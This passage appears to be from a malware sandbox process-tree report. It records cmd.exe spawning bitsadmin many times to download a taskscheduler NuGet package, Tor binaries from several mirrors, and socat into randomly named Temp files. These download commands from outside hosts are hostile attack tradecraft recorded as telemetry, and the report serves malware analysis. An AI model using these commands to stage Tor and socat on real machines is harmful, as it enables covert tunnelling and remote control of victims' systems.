                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                            5⤵
                                                                                                                                              PID:588
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                            4⤵
                                                                                                                                              PID:740
                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                5⤵
                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                PID:632
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                              4⤵
                                                                                                                                                PID:1756
                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                  5⤵
                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                  PID:808
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                4⤵
                                                                                                                                                  PID:836
                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:1760
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1260
                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                        5⤵
                                                                                                                                                          PID:1920
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1864
                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:1692
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1784
                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1732
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:992
                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                                    PID:2004
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1620
                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:632
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2020
                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:1740
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1580
                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:1680
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1920
                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                                  PID:1040
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1156
                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:608
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1104
                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                                                        PID:1656
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:940
                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:1820
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:1600
                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                                                              PID:1740
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1096
                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                                PID:1616
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:2000
                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\wxu3DIg.zip"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:1752
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://dist.torproject.org/torbrowser/7.0.11/tor-win32-0.3.1.9.zip" "C:\Users\Admin\AppData\Local\Temp\ILBP2W8eHU.zip"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:1872
                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://dist.torproject.org/torbrowser/7.0.11/tor-win32-0.3.1.9.zip" "C:\Users\Admin\AppData\Local\Temp\ILBP2W8eHU.zip"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:1052
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://torproject.mirror.metalgamer.eu/dist/torbrowser/7.0.11/tor-win32-0.3.1.9.zip" "C:\Users\Admin\AppData\Local\Temp\ILBP2W8eHU.zip"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:2004
                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://torproject.mirror.metalgamer.eu/dist/torbrowser/7.0.11/tor-win32-0.3.1.9.zip" "C:\Users\Admin\AppData\Local\Temp\ILBP2W8eHU.zip"
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:1832
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://tor.ybti.net/dist/torbrowser/7.0.11/tor-win32-0.3.1.9.zip" "C:\Users\Admin\AppData\Local\Temp\ILBP2W8eHU.zip"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:936
                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://tor.ybti.net/dist/torbrowser/7.0.11/tor-win32-0.3.1.9.zip" "C:\Users\Admin\AppData\Local\Temp\ILBP2W8eHU.zip"
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:972
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1748
                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:668
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:1260
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:2020
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Download via BitsAdmin
                                                                                                                                                                                                                          PID:1708
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1360
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Download via BitsAdmin
                                                                                                                                                                                                                            PID:2000
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1060
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:980
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:1944
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:1644
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:936
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:2008
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1824
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:1040
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:1784
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                                                                                                              PID:1508
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:1156
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                                                                                PID:1868
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:1656
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:980
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:2016
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                      • Download via BitsAdmin
                                                                                                                                                                                                                                                      PID:1144
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:1776
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:880
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:2004
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                            • Download via BitsAdmin
                                                                                                                                                                                                                                                            PID:1920
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:1760
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                                                                                                                              PID:1708
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:2000
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                                                                                                PID:588
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:652
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:980
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:1944
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:972
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:1720
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:1052
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
